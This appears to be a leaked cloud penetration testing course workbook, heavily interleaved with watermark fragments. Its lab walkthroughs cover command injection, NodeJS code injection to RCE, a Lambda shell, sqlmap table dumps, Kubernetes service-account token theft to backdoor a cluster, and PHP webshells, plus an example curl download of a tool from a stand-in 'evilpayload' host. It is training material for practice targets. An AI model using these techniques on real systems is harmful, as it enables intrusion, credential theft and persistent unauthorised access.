Ha

gg
re
This lab begins our Cloud Native Day, one of the core components of a cloud native application is its capability to
G
properly handler URL inputs. We will see how this is impacting our tests going forward with the other
:
To
components of this application.

d
n se
ce
Li
live

Lab 4.3: Command
3e1e3b497543e6c11ac8e4188959c93e
Injections in Cloud Native
Applications
20
,20
28
Brief Intro
ly
Ju
>
Command Injection bugs are quite common given the amount of work that command line tools a ord us. Even
om
when command line tools are not directly called, we can manipulate existing software to inject operating system
_c
commands for us to use. We will be exploring two services in this lab. The /ping service and the invoice service.
ok
23169600 tlo
One thing about these containers, they unlike the last system, are not running python.
@
ou
66

s1
ne

ljo
Gregg Harris
au
Finished Lab 4.2

.sec588.net lab there are multiple
d
endpoints.
n se
ce
2. In the /ping endpoint you will nd a common command line injection.

Li
live
3. Using base64 pull out the contents of the ping.php le on the system to obverse what the vulnerability is
4. Look at the basics of the container that is running by trying to:
a. Read all environment variables

b. Find which applications are and are not installed on the container, how would you move a le on here?
5. Find a way to execute commands through an RCE in NodeJS, the functions is in the invoice search area.
3e1e3b497543e6c11ac8e4188959c93e
a. Can you manipulate javascript in this post?
b. As this is actually as these commands are running in a URL, what do you have to modify to execute code?
20
20
c. Can you look through the le system? Can you run any commands?
,
28
ly
Walkthrough
Ju
>
om
Direct Command Injection
_c
Let's open our Web Browing interface one more time.
ok
23169600
$firefox http://invoice.<class-subdomain>.sec588.net
@
ou
tlo
66
This time we will be look at two URL endpoints, the rst one is our /ping process.
s1
ne
If we click on it we can enter anything we want to ping. Ping localhost on the machine
ljo
Gregg Harris
au
127.0.0.1
<p
s
rri
This should show familiar output.

Ha
Running the ping command:

gg
re
G
PING 127.0.0.1 (127.0.0.1): 56 data bytes

:
To
d
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.033 ms

nse
ce

Li
--- 127.0.0.1 ping statistics --- live

2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.033/0.044/0.055/0.000 ms

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
By running this command we should also notice that we may be able to trigger additional commands:
>
om
Hit the Back icon on the brower and let's try this:
_c
ok
127.0.0.1; ls
23169600
The output should re ect something like:
@
ou
tlo
66
PING 127.0.0.1 (127.0.0.1): 56 data bytes

s1
ne
ljo
Gregg Harris
au

om
We now see at the bottom of the page a new item ping.php
_c
ok
It would appear our container is running a php process called ping. We can do a few things here.
First let's add a spacer

23169600 @
ou
tlo
66
127.0.0.1; echo "============"; ls

s1
ne
We now see a new set of actions below:

ljo
Gregg Harris
au

om
We cannot however view the contents of the php le:
_c
ok
127.0.0.1; echo "============"; cat ping.php
23169600 ou
tlo
This will not show us anything. Why? Becuase the PHP Engine is processing the php commands as code.
@
66
Let's try this:

s1
ne
ljo
127.0.0.1; echo "============"; cat ping.php | base64
Gregg Harris
au
<p
We now can see a base64 encoded string. What you will see is something like this:
s
rri
Ha

gg
========
re
:G
To
PD9waHAKJHN5c3RlbT0kX0dFVFsnc3lzdGVtJ107CnN5c3RlbSgicGluZyAtYzIgJHN5c3RlbSIpOwo/Pgo=
d
n se
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
With this string in hand you can decode it. Open a MATE Terminal and copy the string like so:
om
_c
ok
$echo "PD9waHAKJHN5c3RlbT0kX0dFVFsnc3lzdGVtJ107CnN5c3RlbSgicGluZyAtYzIgJHN5c3RlbSIpOwo/Pgo=" |
base64 -d
23169600 @
ou
tlo
Note that the system will break up the string you need to make it all appear in one single line to work.
66
s1
As we can see this a very simple way of getting access to both source code and the ability to smuggle out items.
ne
ljo
Let's explore what is on this container, type in the following commands to try:
Gregg Harris
au
<p
127.0.0.1; echo "============"; env

s
rri
Ha
127.0.0.1; echo "============"; hostname

gg
re
127.0.0.1; echo "============"; which curl
:G
To
127.0.0.1; echo "============"; which nc

d
se
We can see that the has some interesting items that we may wish to explore in the future.
n
ce
Li
Indirect Command Injection

live
What about a more interesting command injection technique, one which is not so easy to trigger. This parciular
aw is a Code Injection aw that will lead us to Remote Command Execution. Head over to the main site:
invoice.<class-subdomain>.sec588.net

Let's attempt the same trick. First let's enter an invoice number:
3e1e3b497543e6c11ac8e4188959c93e
What we see is some information on the screen. The name of container as well as the invoice date.
20
, 20
28
Let's now attempt the same command injection technique, attempt to type:
ly
1%3Bls
Ju
>
om
This should provide us with an error, if it does not come back right away, restart the request. It may also be
_c
helpful to run this in the command line with curl in case the system is not responding which happens from
ok
time to time.
For curl enter this into the command line:

23169600 @
ou
tlo
$ curl -X POST http://invoice.<class-subdomain>.sec588.net
66
--data "invoiceid=1%3B+ls"
s1
ne
What is returned will be a stack trace from a NodeJS Server.

ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
NodeJS is not the same as many of the other systems in that is can shell out directly. Instead it will require a shell
G
to be constructed out of a set of NodeJS code and the return on that execution must be handled or the injetion
:
To
will be blind. Here are some good ways to execute code.

d
se
Using the fs library you can do the following: To ls a directory you would want to use:
n
ce
readdirSync() To cat a le you would to use: readfileSync()

Li
To execute a command however you need to use the

returns with child_process you can use
live
exec
child_process library. To execute a command that
but it will not return output, instead use execSync .
One thing to note is that the default programming pattern in NodeJS to a request and response is to use the
words res and req so we will need to end the response and in the ending of the response, start a new
request. It will look strange.

In the invoice eld of the browser let's try the following:
res.end(require('fs').readdirSync('.').toString())"
3e1e3b497543e6c11ac8e4188959c93e
Alternatively in cURL: $ curl -X POST http://invoice.<class-subdomain>.sec588.net --data
"invoiceid=res.end(require('fs').readdirSync('.').toString())"
20
20
,
28
This should output us a list of les in a directory.
ly
Ju
Note the text will look like HTML!
>
om
You may see words appear like Dockerfile,index.js,node_modules and the like.
_c
ok
This particular container may have shipped with a Docker le, let's read it:
In the browser enter:

23169600 ou
tlo
res.end(require('fs').readFileSync('Dockerfile').toString())
@
66
Alternatively in cURL:
s1
$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data

ne
"invoiceid=res.end(require('fs').readFileSync('Dockerfile').toString())"
ljo
Gregg Harris
au
This would display the contents of the Docker le.

<p
s
rri
Ha
gg
re
: G
To
d
What happens if we try and read the root of the lesystem? In the browser enter:
nse
res.end(require('fs').readdirSync('/').toString())
ce
Li
Alternatively in the Browser enter the following:

live
$ curl -X POST http://invoice.<class-
subdomain>.sec588.net --data "invoiceid=res.end(require('fs').readdirSync('/').toString())"
It will more than likely fail, the url shows us the following: http://expected-invoice-
svc.default.svc.cluster.local:8080/api/expected-
date/res.end(require('fs').readdirSync('/').toString())

Maybe the / needs to be DOUBLE url encoded to work (%252F). The rst URL encoding will solve it on the front
end service and the second URL encoding will solve it heading to the second system.
3e1e3b497543e6c11ac8e4188959c93e
In the browser enter: res.end(require('fs').readdirSync('%252F').toString())
In cURL enter the following commands: $ curl -X POST http://invoice.<class-subdomain>.sec588.net -

-data "invoiceid=res.end(require('fs').readdirSync('%252F').toString())"
20
, 20
28
ly
Ju
>
How can we triggering command execution this way?
om
_c
ok
"invoiceid=res.end(require('child_process').execSync('ls').toString())"
23169600 ou
tlo
Alternatively if we only had the ability to read and write to the le system we could use this command:
@
66
s1
Please note we are using a random le name because multiple students will be attacking the same host. The
ne
general task her is to put our return values in a le like so: "ls > random_ le_name" where "random_ le_name" is
ljo
something you choose.
Gregg Harris
au
 <pick a random name>').toString())"

Ha
gg

re
"invoiceid=res.end(require('fs').readFileSync('<same as the above command random
G
name>').toString())"
:
To
d
Now we have a very rudamentary RCE. We can from here go further, such as reading environment variables and
se
more. Is this pretty? No, no one would actually want to hack this way for long, however it does get us the access
n
ce
we need.
Li
live
With this level of access we now have 2 remote code executions and an SSRF bug, this will provide us with the
beginnings of a way to get deeper into a web application.

In the last 2 labs we have gone from a non-priviledged, or less than privileged AWS user to a user that has the
capability to perform additional functions. By performing these operations we should be able to gain more
access to the AWS environments and we can show the criticality of why these keys need to be protected.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
nse
ce
Li
live

Lab 4.4: Backdoors in
3e1e3b497543e6c11ac8e4188959c93e
Serverless Functions
20
Brief Intro
, 20
28
While command injection and SSRF's are attacks that plague a wide number of applications, and allow for
ly
internal pivots, Serverless functions themselves can allow us to move around the environment.
Ju
>
In this lab we are going to introduce you to a serverless environment where we can upload a javascript NodeJS
om
function that will give us a full le shell.
_c
ok
23169600 @
ou
tlo
66
s1
Finished Lab 4.2

ne
Have a stable internet connection, with a webbrowser and access to cURL.

ljo
Gregg Harris
au
Try It Yourself
<p
s
rri

Ha
gg
1. You should be using the same aws credentials from Lab2.5 for this lab. (pro le named lab25 )
re
2. SSH into the IP addess from Lab2.5 that has the ec2-kms-role .
G
3. Use the Lambda-shell project in /opt/lambda-shell .

:
To
4. The apex binary will allow you to execute the shell.

d
n se
Walkthrough
ce
Li
Getting an access token

live
We are going to use our access_token from Section 2. Let's try and use this token:
$ aws iam get-role --role-name ec2-kms-role-<class-subdomain> --profile lab25

If you get an error that the token is now expired. The tokens in the metadata API have a maximum expiration of 6
hours. To get this token to function we will need to get a new token:
3e1e3b497543e6c11ac8e4188959c93e
ssh -i /home/sec588/files/workdir/studentX-<class-subdomain>.pem ubuntu@<ip from section2>
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-kms-role-<class-
subdomain>
20
This command does the following:
,20
28
SSH into the host as the ubuntu user
Get access to the IAM MetaData service through cURL.
ly
Ju
With this session token we can now deploy a lambda function. We have provided a lambda shell function in the
>
om
IAM so that you can explore how to execute a shell within a Lambda function.
_c
ok
Editing the project le
23169600 ou
tlo
We need to rst gure out our IAM Role that we are using, one way is to run a command like so:
@
66

s1
ne
ljo
This WILL fail, but it will give you the information needed to proceed.
Gregg Harris
au
:assumed-role/ec2-kms-role-<class-subdomain>/<instance id>

gg
re
The information you will need is:
:G
To
The <account-id>
d
The role as followings: ec2-kms-

n se
ce
With this role noted, we can now use pieces of this information correctly.
Li
Our example shell is located at /opt/lambda-shelllive to use it we need to make a few changes:
First you need to edit /opt/lambda-shell/project.json
Change two sections of this:

First there is a line that reads: "name": "lambda-shell-student9001"
Change 9001 to your student number.
3e1e3b497543e6c11ac8e4188959c93e
Second there is a line that reads the role, the role should be: arn:aws:iam::<number>:role/ec2-kms-role-
<class-subdomain>"
20
You will need to validate a few things:
, 20
28
The account is valid
ly
The <class-subdomain> role is valid
Ju
>
If they are we can then move to run and execute the role.
om
_c
Executing our shell
ok
23169600
First we need to deploy our shell to a new lambda function: @
ou
tlo
66
$ cd /opt/lambda-shell
s1
ne
$ apex --profile lab25 deploy

ljo
Gregg Harris
au
It should nish, if it does then we can execute it using our looping function:
<p
s
$ ./lambda-shell
rri
Ha
With the lambda-shell running we are now able to run some commands and explore.
gg
re
Type:
G
ls
:
To
This will take a few minutes to run as the lambda function will need to deploy and execute. After it is deployed
d
se
you can now run with a much faster motion as it is a warm started condition.
n
ce
One of the things about Lambdas that you may notice right away is that many of them may not have the IP
Li
connectivity we are used to.

live
Type: $ ip
You will get an error from /bin/sh that ip is not found.

Type: id; whoami
You will probably see that you are running as a random lower privileged sandbox user.
3e1e3b497543e6c11ac8e4188959c93e
As a matter of fact this particular container may actually be Amazon Linux:
Type: cat /etc/system-release
20
20
You will see that it is of: Amazon Linux 2 (Karoo)
,
28
ly
One again we are challenged with some items like are we able to move laterally, and the answer will depends on
Ju
a few things:
>
om
1. What IAM Privileges do we have with the Lambda
_c
2. What VPC is the Lambda in
ok
3. What else can the Lambda do?
23169600 ou
tlo
Because we are executing and creating this lambda ourselves it is not the same as an already running lambda
@
that can do command execution.
66
s1
If we click on it we can enter anything we want to ping. Ping localhost on the machine
ne
ljo
Gregg Harris
au
Type: env
<p
What we can see are various variables including the 169.254 address space. This shell allows us to better
s
rri
understand how serverless environment works and their limitations. Each severless container will be di erent,
Ha
so a Python Runtime will behave di erently than a NodeJS runtime and the like. If you would like to see how the
gg
runtimes operate you can view this directory that holes the runtime:
re
G
Type: env | grep runtime

:
To
d
Look for the LAMBDA_RUNTIME_DIR= which in our case is the /var/runtime directory. You can explore
se
these les some will work some won't. If you get stuck ^C the shell and come back in.
n
ce
Li
Type: ls /var/runtime
Conclusion
live
Serverless environments, depending on the cloud provider, will have various limitations depending on the
provider. AWS Lambda for example is a rather constrained serverless environment that is di erent than Azure.
Our explorations will highlight the di erences.

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
nse
ce
Li
live

Lab 4.5: SQL Injections in
3e1e3b497543e6c11ac8e4188959c93e
RDS
20
Brief Intro
,20
28
SQL Injections can be very di cult to understand. There are many areas in which the injection can be broken,
ly
some of it will lead to successful exploitation and some will not. Some will be easy to uncover and will not. This
Ju
lab is designed to re ect on how to this is possible and in which conditions exploitation is available to us.
>
om
Overall Lab Architecture
_c
ok
We have an application that is located on the following URL:
23169600
http://sqlinj.<class-subdomain>.sec588.net/index.php
@
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
se
This application is very straightforward:

n
ce
1. It has a form that will reach out to /api.php

Li
2. The order_id=
3. The result of the query to order_id=
4. The array is called via cURL in PHP.
live
is lled out with what is passed on the form.
is a json array that is successfully returned.
5. Once the query comes back it is rendered in a JSON array
The screenshow below shows our API call:

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
Let's explore this environment so that we can try and uncover any types of SQL Injections.
>
om
_c
ok
This lab requies the student to have: 23169600 @
ou
tlo
Have a stable internet connection, with a webbrowser and to a copy of SQLMap.
66
s1
ne
Try It Yourself
ljo
Gregg Harris
au

.sec588.net/index.php .

Ha
2. Try looking up invoice 1234 .

3. Try some of the common SQL Injection techniques: ' ,
gg
"
4. Look at the Restful API Call:
re
http://sqlinj.<class-subdomain>.sec588.net/api/1234
G
5. Try using sqlmap on both of these URL's.

:
6. Look at the underlying code in the walkthrough, and see if you can uncover the actual URL.
To
7. Use SQLMap against the new URL, see if it vulnerable to SQLInjection.

d
nse
Walkthrough
ce
Li
Looking for Obvious SQL Injections live

Some SQL Injections, are very obvious, others are not. Let's look at our Site:
http://sqlinj.<class-subdomain>.sec588.net/index.php

This website has one form, in which we test for SQL Injection/.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
Let's try a few common SQL Injection tests that will try to display 'Errors Based SQL'. This type of SQL Injection is
ok
not as common, and we can see that this type of testing will not yield us any obvious result.
' or "
23169600 ou
tlo
in the form will not show us Errors based SQL. What about if we use a tool like
@
sqlmap.py ?
66
s1
ne
ljo
Gregg Harris
au
.sec588.net' --data
"order_id=1234&submit=submit"

This will run SQLMap with the following switches:
-u provides the URL in question
3e1e3b497543e6c11ac8e4188959c93e
--data "order_id=1234&submit=submit" this send a POST value with the appropriate values that are
submitted with the form
20
Many of our API's are RESTful in nature, and this particular endpoint is no di erent. Let's take a look at the code
20
powering our website.
,
28
ly
Ju
<? php
>
om
if (isset($_POST['order_id']) && $_POST['order_id']!="") {
$order_id = $_POST['order_id'];
_c
$url = "http://localhost/api/$order_id;
ok
$client = curl_init($url);
23169600
curl_setopt($client,CURLOPT_RETURNTRANSFER,true);
$response = curl_exec($client);
@
ou
tlo
66
$result = json_decode($response);
s1
ne
ljo
Gregg Harris
Notice the following two lines in this statement:
au
<p
$order_id = $_POST['order_id'];
s
rri
Ha
$url = "http://localhost/api/$order_id";
gg
re
The lines show us that the URL is being past in a HTTP POST and then past in as a URL.
: G
To
This type of information can be pulled out of websites in multiple ways. For this paricular lab we are skipping the
d
methods for obtaining the source code. Instead we are focusing on the URLs:
n se
ce
http://sqlinj.<class-subdomain>.sec588.net/api/1234
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
Open a Firefox Terminal and get to the appropriate URL:
>
om
Let's try getting a URL: http://sqlinj.<class-subdomain>.sec588.net/api/%27
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
What we see is an Apache Error Message, stating that a speci c page is not found. This is not a PHP error or
re
MySQL error message. There could be a few ways that this is occuring. Here is a shortcut.
: G
To
Looking at RESTful APIs

d
se
Our .htaccess le is re-writing URL's so that PHP based code is now a RESTful endpoint.
n
ce
Li
RewriteEngine On
live
# Turn on the rewriting engine
RewriteRule âpi/([0-9a-zA-Z_-]*)$ api.php?order_id=$1 [NC,L]

The RewriteRule is show us that anything that is passed in the URL is written to a URL that has a variable of
order_id . It is also matching a regex value of only numbers or letters, no special characters.
3e1e3b497543e6c11ac8e4188959c93e
The following two URL's are the same:
/api/1234
20
/api.php?order_id=1234
, 20
28
SQL Injecting the RESTful Endpoint
ly
Ju
What if we attempt SQL Injection on this particular endpoint?
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
We see a JSON Array is returned, the JSON Array is rendered NULL. Let's look at the code that is causing our
rri
Ha
injections:
gg
re
G
if (isset($_GET['order_id']) && $_GET['order_id']!="") {

:
To
$order_id = $_GET['order_id'];
d
se
$sql = "SELECT * FROM transactions WHERE order_id = $order_id";

n
ce
Li
live
The vulnerability here is that whatever is passed into the GET parameter of order_id is directly passed into SQL.
Without any ltering this is directy passed into the SQL Engine. This is classic SQL Injection, but without tools it
would not be discoverable.
Let's try the following, open a MATE terminal and run the following commands:

$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234'
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 tlo
If you accept the default you will see that SQL Injection is now possible.
@
ou
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
se
Carefully Constructing Queries

n
ce
We need to be careful as this particular system maybe a shared database instance. Heavy queries should be
Li
live
avoided if possible, and having shells are not possible in many cloud environments as they do provide us with
clear guidance on this. Attempt some of the following queries:
$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' --dbs
This should show us the databases on the system. Let's also see all the tables in the db database:

$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' -D db --
tables
3e1e3b497543e6c11ac8e4188959c93e
The database should have a single table which would be the transactions
continue looking for more tables. Let's just play with the single database views.
table. We can dump this table, or
$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' -D db -T
20
transactions --count
, 20
28
We can see how many items are in the database using the count command, how can we safely dump a record to
see?
ly
Ju
>
$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' -D db -T
om
transactions --dump --start=1 --stop=1
_c
ok
This concludes our tour of SQLMap and how to nd injections in Cloud Native Applications. We do request that
of Service in the AWS environment.

23169600 @
ou
tlo
dangerous commands like Command Shells not be executed in the context of this lab as it can violate the Terms
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
d
nse
ce
Li
live

Lab 4.6: Kubernetes and
3e1e3b497543e6c11ac8e4188959c93e
Peirates
20
Brief Intro
, 20
28
Kubernetes is a container orchestration and lifecycle management framework. It is not the the only framework
ly
that does this, as there are a few others, but by far and away, Kubernetes has done a very good job in being the
Ju
most commonly used one today. As such Kubernetes has a management layer that does is implemented on top
>
of existing cloud environments. There are several ways to manage Kubernetes, there is a "Managed
om
Con guration", in which a cloud provider will manage the Kubernetes cluster for you and use their native Access
_c
Management framework for Kubernetes maangement.
ok
23169600 ou
tlo
The other way to manage the system is what is known as "Unmanaged Kubernetes" in which the system is not
managed in any meaningful way by the Cloud Provider. This would be on-premise or an in the cloud managed
@
kubernetes. Kubernetes being such a complex system, does have "vendor supported" implementations. Which
66
ones?
s1
ne
Rancher
ljo
Gregg Harris
au
<p
Heptio
s
rri
Kontena
Ha
gg
Pivotal Container Service

re
G
While each of their has their speci c reasons for existing, we will be working with two types of Kubernetes in our
:
To
Class Environments.
d
se
AWS EKS (Elastic Kubernetes Service) and unmanaged with KOPS .

n
ce
Li
KOPS is the Kuberentes Operations Service (https://github.com/kubernetes/kops) .
In this Lab we will give you a tour of the follow:

live
Kubernetes to Manage Containers

Privilege Pods Deployments
Pieretes for Pivoting around an Environment
3e1e3b497543e6c11ac8e4188959c93e
20
This particular lab will require the following components:
20
1. The cli tools
,
aws
28
2. The pro le AWS keys obtained in Lab 1.4 and Used in Lab2.2
ly
3. kubectl binary
Ju
4. pierates binary
>
om
Try It Yourself
_c
ok
Walkthrough 23169600 @
ou
tlo
66
Getting a working kubectl con guration

s1
ne
Some AWS Users may have rights to Kubernetes, this will depend on a few things.
ljo
Gregg Harris
au
1. Who has access rights to build a kubernetes con guration le that can get a user to have a proper
<p
con guration to use with their Kubectl.

s
rri
2. Who has writes inside of the Kubernetes Cluster.

Ha
gg
Each user may or may NOT have access to the RBAC cluster, by default many AWS users do not. Kubernetes has
re
a Authentation and now an Authorization access control system.
: G
To
AuthN and AuthZ (https://kubernetes.io/docs/reference/access-authn-authz/rbac/)

d
se
Explicitly there is even the following warning:

n
ce
Li
live
The following policy allows ALL service accounts to act as cluster administrators. Any application running in a
container receives service account credentials automatically, and could perform any action against the API,
including viewing secrets and modifying permissions. This is not a recommended policy.

kubectl create clusterrolebinding permissive-binding \
--clusterrole=cluster-admin \
3e1e3b497543e6c11ac8e4188959c93e
--user=admin \
--user=kubelet \
--group=system:serviceaccounts
20
20
We will begin by nding any EKS clusters:
,
28
ly
aws eks list-clusters --region us-east-1 --profile lab22
Ju
>
You should see a cluster called:
om
_c
class-eksctl-<class-subdomain>
ok
23169600 ou
tlo
Next we will build our own Kubernetes Con guration from EKS. While this may not be your starting point for
attacking a live Kubernetes Cluster, given that we have a set of API keys we can start here:
@
66
s1
aws eks update-kubeconfig --name class-eksctl-<class-subdomain> --region us-east-1 --profile

ne
lab22
ljo
Gregg Harris
au
The output should re ect that we have a new .kube/con g le created. With this le we can now manage a
<p
Kubernetes Cluster.
s
rri
Ha
You will need at a minimum eks:DescribeCluster permissions for this to work

gg
re
:G
To
d
n se
ce
This does not grant you access to a Kubernetes Cluster it only grants you access to get a con guration. You
Li
live
should note that this was the default con guration in versions prior to 1.2, and while more and more rare, could
still be the case.
How can we test this con guration?
kubectl get pods

You also see more information like so:
kubectl get pods -o wide
3e1e3b497543e6c11ac8e4188959c93e
This command should output any pods that we may have running in our environment. There are many pods and
containers that may be running. We can attack to one of these instances by running the following command:
20
kubectl exec -ti <container> /bin/bash
,20
28
This would allow us to interact with the containers /bin/bash environment.
ly
Ju
You may not get a prompt!
>
om
ls
_c
ok
This should work.
23169600 ou
tlo
Now that we have this level of access let's see how we can make better assumptions.
@
66
CTRL-C
s1
ne
Can you get pods? Let's nd out:

ljo
Gregg Harris
au
<p
$ kubectl auth can-i get pods

s
rri
$ kubectl auth can-i exec pods

Ha
gg
We have a few options, if you recall from an earlier exercise we had command injection .
re
G
Let's play with this:

:
To
d
se
$ kubectl get pods

n
ce
Find the ping-svc, this was the vulnerable process we are going to execute a few commands.
Li
live
Find a directory to run our payload, we will create one in /tmp/studentX replacing X with your numerical value:
$ kubectl exec ping-svc-<random-number> mkdir /tmp/.studentX
$ kubectl cp /opt/peirates/peirates ping-svc-<random-numbers>:/tmp/.studentX/peirates

Now why would we wnat to run peirates anyway we already have some form of elevated access? Well we do
want to demonstrate that peiratas is able to be moved into a pod with mouch more ease than kubectl as it is a
smaller system.
3e1e3b497543e6c11ac8e4188959c93e
Using the command injection lab one of the options that we could also attempt is:
This is just an example command do not run
20
20
cmdinj.php?=curl+http://evilpayload/periatas+-O+/tmp/peiratas;/bin/chmod+777+/tmp/peiratas
,
28
This would the binary to the system, we would need a seperate way to gain access to the sysem.
ly
Ju
This will take some time to copy, once it is there we can then execute peirates, there a few ways to do this, we
>
could always
om
_c
ok
$ kubectl exec -i ping-svc-<random-number> /tmp/.studentX/peirates
23169600
If you miss the -i it will not work you will need to CTRL-C
@
ou
tlo
From here we will have a menu system. A few things we can:
66
s1
1. Type to get a list of pods

ne
3
2. Type to get a list of secrets!
ljo
10
Gregg Harris
au
<p
One nal thing we can do is to actually use the service account kubelet if it is miss con gured against the
system. This would require a serious node miscon guration but these con gurations are not uncommon:
s
rri
Ha
$ kubectl get secrets

gg
re
We should see a list of secrets, record the name of the secret you will need it for the next commands.
: G
To
The secret you are looking for will be of the following TYPE: kubernetes.io/service-acount-token
d
n se
ce
Record the following values

Li
Certi cate: live

$ kubectl get secrets <secret name> -o jsonpath='{.data.ca\.crt}'
Token:

$ kubectl get secrets <secret name> -o jsonpath='{.data.token}' | base64 --decode
Alternatively, if you didn't have access to the Kubernetes API itself with kubectl but had access to the container,
3e1e3b497543e6c11ac8e4188959c93e
the values are found there.
Do not do this, but the the command below would be run from within the container. Below is an example.
20
20
root@<container># ls /var/run/secrets/kubernetes.io
,
28
ly
The ca.crt and token . Normally these two items would not cause an issue as every Kubernetes node
Ju
needs to speak back to the API server. This is of course unless someone has loosen that restriction. How could
>
we internally or externally leverage these types of credentials?
om
_c
ok
Below this command continues the pervious commands.
23169600
$ cat /home/sec588/.kube/config | grep server
@
ou
tlo
66
s1
In here you will see a value called:

ne
ljo
Gregg Harris
server:
au
<p
Copy this value, create a new con g le

s
rri
Ha
Place the certi cate value within the 'certi cate value' section of kubetest without the quotes ' Place the server
value within the 'server value' section of kubetest without the quotes ' Place the token value within the 'token
gg
value' section of kubetest without the quotes '

re
G
You now have a cryptographically signed service account login for kubernetes.
:
To
d
se
$ nano kubetest
n
ce
Li
live

apiVersion: v1
clusters:
3e1e3b497543e6c11ac8e4188959c93e
- cluster:
certificate-authority-data: 'certificate value'
server: 'server value'
name: development
contexts:
20
- context:
20
cluster: development
user: aws
,
28
name: aws
current-context: aws
ly
kind: Config
Ju
preferences: {}
>
users:
om
- name: aws
_c
user:
token: 'token value'
ok
23169600 @
ou
tlo
To see if this runs type the following:
66
s1
$ kubectl --kubeconfig .\kubetest get pods

ne
ljo
Gregg Harris
au
If you can list out pods you now have a backdoored account to the Kubernetes Management system.
<p
Conclusions
s
rri
Ha

gg
re
:G
To

d
n se
ce
Li
live

Lab 5.1: Heavy and Light
3e1e3b497543e6c11ac8e4188959c93e
Shells
20
Brief Intro
, 20
28
While many of us are not developers, we may nd the need to build or operate a "heavy" or "light" shell as part
ly
of a penetration test. Understand the di erence between each of those, is key to understanding how we could
Ju
use an environment.
>
om
_c
ok
need the following tools:
23169600 @
ou
tlo
This lab does not require internet connectivity, the lab is self contained running from your computer. You will
66
Curl from the command line

s1
Wireshark which is a GUI application.

ne
ljo
Try It Yourself
Gregg Harris
au
<p
We wanted to demonstrate the big di erence between a Lightweight Shell and a bigger heavyweight shell.
s
rri
Ha
1. Go into /opt/php-webshell
gg
re
2. Run the following command docker-compose up -d
: G
To
3. Access the test environment with a Web Browser by running: http://localhost:8080 , you will see a
d
page.
se
phpinfo()
n
ce
4. Start Wireshark and choose the local loopback adapter.

Li
live
5. Once this is all running look at the di erences betewen each page by looking at the following les:
$ cat /opt/php-webshell/code/webshell.php
$ cat /opt/php-webshell/code/lightshell.php

$ cat /opt/php-webshell/code/auth.php
6. Execute the following minimum commands in each one of these shells: ls
3e1e3b497543e6c11ac8e4188959c93e
cat /etc/passwd
env
20
20
id
,
28
ly
Try and do it in a single command and make the output 'pretty', see how the more you add the more the shell
Ju
changes in Wireshark.
>
om
Walkthrough
_c
ok
Setting up the environment
23169600 @
ou
tlo
Let's open the MATE terminal so that we can get our local environment running.
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
d
n se
ce
Li
live

We have provided you with non-production single webshell examples running in on our machine.
webshell.php : Whatever you pass to x= in the URL will be run a command
3e1e3b497543e6c11ac8e4188959c93e
lightshell.php : Whatever you PHP code you paste into the POST in the x variable will be run as php
code, this is di erent than webshell.php.
20
auth.php : The same as lightshell.php , but you need to provide a HTTP Authentication Bearer token.
, 20
28
Now that we understand each let's start our docker instance.
ly
Ju
$ cd /opt/php-webshell
>
om
$ docker-compose up -d
_c
ok
23169600
This should re ect that two containers are now running in your environment.
@
ou
tlo
66
s1
ne
ljo
Gregg Harris
au

Navigate to http://localhost:8080
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au

om
_c
ok
23169600 @
ou
tlo
66
s1
ne
From here you can type $ sudo wireshark

ljo
Gregg Harris
au
To monitor our interface we can select it and click on the Shark n in the corner.

om
_c
ok
23169600 @
ou
tlo
66
The Wireshark interface may zoom by, one of the ways you can see what is going on is to use the lter, type
s1
ne
ljo
Gregg Harris
au

om
_c
ok
The portion in the red
23169600
is the request, the portion in the ou
tlo
blue
@
is the respose. Using this you can observe
each request.
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live

Looking at the different shells
The rst shell we will be looking at is the standard GET requested webshell.
3e1e3b497543e6c11ac8e4188959c93e
In the terminal window run the following command:
$ cat /opt/php-webshell/code/webshell.php
20
20
You will see a very small shell that will execute a system command based on whatever is passed to the variable
,
x. You can execute it like so:
28
ly
Ju
$ curl http://localhost:8080/webshell.php?x=ls
>
om
If we look at Wireshark what you will see is very small request with a large response:
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
Given this let's run a few other commands so that you can see how the system works:
gg
re
$ curl http://localhost:8080/webshell.php?x=id
: G
To
$ curl http://localhost:8080/webshell.php?x=env
d
n se
